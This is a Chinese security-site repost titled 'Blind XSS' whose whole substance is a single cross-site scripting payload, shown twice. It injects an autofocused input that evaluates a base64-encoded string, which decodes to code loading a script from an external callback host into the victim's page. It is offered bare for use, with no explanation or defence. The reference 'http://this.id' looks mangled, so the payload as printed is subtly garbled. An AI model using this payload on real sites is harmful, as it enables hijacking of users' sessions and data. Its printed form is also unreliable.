CTF导航 CTF导航

Blind XSS

渗透技巧 2年前 (2022) admin
432 0 0


Payload:

"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2x3YS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>


“><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2x3YS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>


Blind XSS


原文始发于微信公众号(Khan安全攻防实验室):Blind XSS

版权声明:admin 发表于 2022年6月6日 上午8:40。
转载请注明:Blind XSS | CTF导航

相关文章

CVE-2022-28810 Zoho ManageEngine ADSelfService Plus远程命令执行漏洞
admin
1,040
一些关于CobaltStike的闲言碎语
admin
212
如何在1小时内从IDOR获得1350美元的赏金奖励
admin
719
Apache ActiveMQ RCE 分析 (CNVD-2023-69477 / CVE-2023-46604)
admin
90
学习笔记 | Spring Security RegexRequestMatcher 认证绕过及转发流程
admin
630
CVE-2020-9715: Exploiting the Adobe ESObject Use-After-Free Vulnerability
admin
1,085

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

EvilGophish’s Approach to Advanced Bot Detection with Cloudflare Turnstile
0
CreateRCE — Yet Another Vulnerability in CreateUri
0
BGPWatch — BGP路由分析和诊断平台
0
进程命令行参数欺骗
0
内容劫持 | Electron 安全
0
凭据获取之浏览器
0
实战环境中的Redis 延时注入
0
每日安全动态推送(4-18)
0
漏洞挖掘 | DreamerCMS RCE (CVE-2024-3311)
0
Weblogic RCE(CVE-2024-21006)
0